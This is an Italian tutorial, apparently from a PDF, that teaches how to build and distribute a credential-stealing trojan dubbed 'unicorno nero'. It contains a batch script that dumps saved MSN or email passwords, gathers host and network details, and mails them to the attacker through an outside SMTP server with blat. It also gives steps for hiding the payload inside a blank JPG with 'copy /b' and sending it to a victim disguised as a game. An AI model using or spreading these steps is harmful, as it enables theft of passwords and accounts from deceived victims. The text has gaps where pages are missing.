Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
Disclaimer
Il seguente libro è allo scopo illustrativo e informatico. L’autore Angelo Nappi non si
assume responsabilità delle informazioni assimilate e delle azioni che ne possono
derivare. Qualunque atto che vada contro la legge informatica n23
art1,2,3,4,5,6,7,8,9,10,11,12,13 è punibile e perseguibile
Penalmente
Le azioni riportate nel documento sono state testate su macchine di mia stessa
proprietà.
Quest’opera è stata rilasciata sotto la licenza Creative Commons
2
assumerete tutte le responsabilità di quello che farete con ciò spiegato in questo
documento
Introduzione
Questa guida è stata realizza per illustrare semplicemente attraverso pochi passi
come creare un virus o meglio un Trojan invisibile agli antivirus. Questo nuovo trojan
da me progettato ha preso il nome di “unicorno nero”.
L’ unicorno nero riesce semplicemente attraverso l’apertura di un file, inviato
attraverso messaggistica istantanea o e-mail a prelevare le informazioni della vittima
(password,contatto msn,server,ip,e quant’ altro) ovviamente senza che l’antivirus possa
rilevarlo come file “dannoso”
In genere col termine Trojan ci si riferisce ai trojan ad accesso remoto (detti anche
RAT dall'inglese Remote Administration Tool), composti generalmente da 2 file: il file
server, che viene installato nella macchina vittima, ed un file client, usato dal pirata
per inviare istruzioni che il server esegue. In questo modo, come con il mitico
stratagemma adottato da Ulisse, la vittima è indotta a far entrare il programma nella
città, ossia, fuor di metafora, ad eseguire il programma. Esistono anche alcuni
software legali, come GoToMyPC o PCAnywhere, con funzionalità simili ai trojan, ma
che non sono dei cavalli di Troia poiché l'utente è consapevole della situazione.
3
dalle software house degli antivirus, è possibile che esso venga rilevato, con la
scansione euristica, come probabile malware.
Un trojan può contenere qualsiasi tipo di istruzione maligna. Spesso i trojan sono usati
come veicolo alternativo ai worm e ai virus per installare delle backdoor o dei
keylogger sui sistemi bersaglio.
A seguito vi riporto uno spezzone di testo prelevato dall’ottimo libro di murder code
“The black book of infernet” al capitolo 7
Trojan
“proprio come i greci si nascosero dentro un cavallo di legno per poi attaccare il cuore
della città di Troia, il trojan attacca il nostro sistema esponendosi al sistema e
all’utente come un software utile al nostro scopo contenendo però codice nocivo in
grado di compromettere l’intero sistema. Un antivirus scarso difficilmente
riconoscerà l’infezione, mentre per unire due semplici programmi solitamente il lamer
della situazione si arma di un blinder o merge e compie il suo sporco lavoro.
4
“NON E’ VERO OGGI E’ POSSIBILE
ATRRAVERSO L’UNICORNO NERO”
L’ unicorno nero si nasconde dietro un file spesso un immagine bianca ma che verrà
aperto automaticamente come un eseguibile in modo che la vittima nn si accorga di
niente e neanche l’ANTIVIRUS ovviamente. Ovviamente dopo un po’ di TEORIA
passiamo adesso alla …….
PRATICA
La guida deve essere seguita attentamente…in ogni suo passaggio in quanto ne
potrebbe compromettere il suo giusto funzionamento….
INIZIAMO…..
FASE 1
Tutto ciò che vi occorre è:
a) Quick Batch File Compiler vi consiglio di scaricarlo dall’emule con tanto di crack se
no non funziona
http://sourceforge.net/project/downloading.php?group_id=81910&use_mirror=kent&
filename=blat262.full.zip&95548550 estrarre il file solamente blat.exe presente nella
cartella full
Ora vi spiegherò come creare il file da mandare alla vittima. Appena la vittima apre il
file automaticamente ti arriverà la sua password di msn (se ce l'ha salvata nella
schermata di login)
5
2° Copiarci dentro questo codice
<<inizio CODICE>> ovviamente “inizio codice” nn bisogna copiarlo, copiare solo quanto
scritto giù
@echo off
mspass.exe /stext Test.txt
echo. >> Test.txt
cls
echo COMPUTERNAME = %COMPUTERNAME% >> Test.txt
echo USERNAME = %USERNAME% >> Test.txt
echo USERDOMAIN = %USERDOMAIN% >> Test.txt
echo USERPROFILE = %USERPROFILE% >> Test.txt
echo. >> Test.txt
ipconfig /all >> Test.txt
echo. >> Test.txt
netstat -na >> Test.txt
cls
@blat -install smtp.tiscali.it Password@tiscali.it
cls
@blat Test.txt -to TuaMail
cls
del blat.exe
del Test.txt
del Mail.exe
6
4° Cliccare in alto su "Project" e andare su "Options" selezionando poi "Ghost
Application"
7° Creare un archivio con dentro i file del Blat, MsnPass.exe e Mail.exe clikkate i 3
file e con il destro “aggiungi ad un archivio” DOVETE AVERE WINRAR SE NN L’HO
AVETE LO DOVETE SCARICARE E INSTALLARE
7
12° Andare nella sezione "Modalita" e selezionare "Nascondi Tutto" e "Sovrascrivi
tutti i file già esistenti"
14° ovviamente se vogliamo le password di msn dovremo mettere all’inizio del codice
mspass.exe se invece vogliamo le password dell’email dovremo sostituire mailpv.exe
all’inizio del codice ; da ricordare poi di creare l’archivio con il programma scelto
15° vi consiglio di mettere tutti i file in una cartella in modo da tenere tutto ordinato
FASE 2
Adesso abbiamo creato il nostro trojan ma purtroppo è visibile all’antivirus ora
vedremo come sarà possibile evitare tutto ciò. Creiamo una nuova cartella ovviamente
contenete solamente archivio auto-estraibile che abbiamo creato e rinominiamolo
“setup” in modo da far sembrar + veritiera la cosa. Allo stesso tempo andiamo sul paint
presente in strart-accessori e non disegnamo nulla ma solamente salviamo come
“ciao.jpg” nella cartella creata così avremo la nostra bella immagine bianca.
UNA VOLTA FATTO CIO prendiamo il file setup (archivio ke abbiamo creato prima) e
nuovamente stavolta cn il destro del mouse facciamo “aggiungi ad un archivio…”
stavolta facciamo direttamente su ok e nella cartella si crereà un file con nome
“setup” ma ovviamente in rar dentro il quale ce il vero setup.exe.
Ora usciamo dalla cartella e rinominiamo la cartella “ciao” per semplicita e mettiamola
sul desktop
Una volta fatto cio andiamo in start poi su esegui e digitiamo “cmd” senza virgole alte
Successivamente scriviamo sul command “cd desktop” e premiamo il tasto invio
8
Successivamente scriviamo “cd ciao” sarebbe la nostra cartella sul desktop
Ora scriviamo “copy /b ciao.jpg + setup.rar finale.jpg” se avremo fatto tutto in modo
coretto ci uscirà questa schermata
Adesso se andiamo a vedere nella cartella ciao sul desktop sara stata creata un
immagine col nome “finale” e se l’apriamo sarà un immagine bianca
NON CI CREDERETE MA QUELLA FOTO è IL NOSTRO UNICORNO NERO IN
GRADO DI CATTURARE PASSWORD FACENDOLA APRIRE ALLA NOSTRA
VITTIMA BASTA DIRGLI CHE è UN GIOCO. Ma prima di questo
Dobbiamo rinominare l’estenzione da .JPG a .RAR per i meno pratici basta andare nella
nostra cartella su a tutto in STRUMENTI-OPZIONI CARTELLA…-
VISUALIZZAZIONI-E TOGLIERE LA SPUNTA DA “NASCONDI LE ESTENZIONI
PER I TIPI DI FILE CONOSCIUTI”
Ora rinominiamo il nostro file “finale.jpg” in “gioco.rar” o nel nome che volete ora
basta inviarlo alla vittima dicendo che è un gioco che circola o quello che cazzo volete
9
voi…… anche per msn tanto l’antivirus non lo rileva. La vittima quando andra ad aprire il
“gioco.rar” si troverà di fronte a setup.exe ke ovviamente lo aprira…..
Basta aspettare un po e nella nostra e-mail che abbiamo indicato nel codice di prima ci
arriveranno le sue password e i suoi account……….
Ovviamente è stato testato su mie macchine è funziona al 100%
Se proprio avete l’esigenza di copiare i codici e gli indirizzi per scaricare i programmi
ma non lo potete fare poiché questa guida è stata realizzata in formato .pdf allora
collegatevi a questo sito per trasformare la guida in file di testo o word
http://aranzulla.computer.alice.it/da-pdf-a-doc-convertire-un-documento-pdf-in-un-
documento-word-finito-1005.html (almeno questo indirizzo lo dovrete copiare in
internet mi dispiace)
Spero che sia stato chiaro in questa breve guida e spero di ricevere tante e-mail per
dubbi, chiarimenti, critiche e quant altro.
KILL MSN
(Angelo Nappi)
angelo8702@libero.it
jamy8702@hotmail.it
10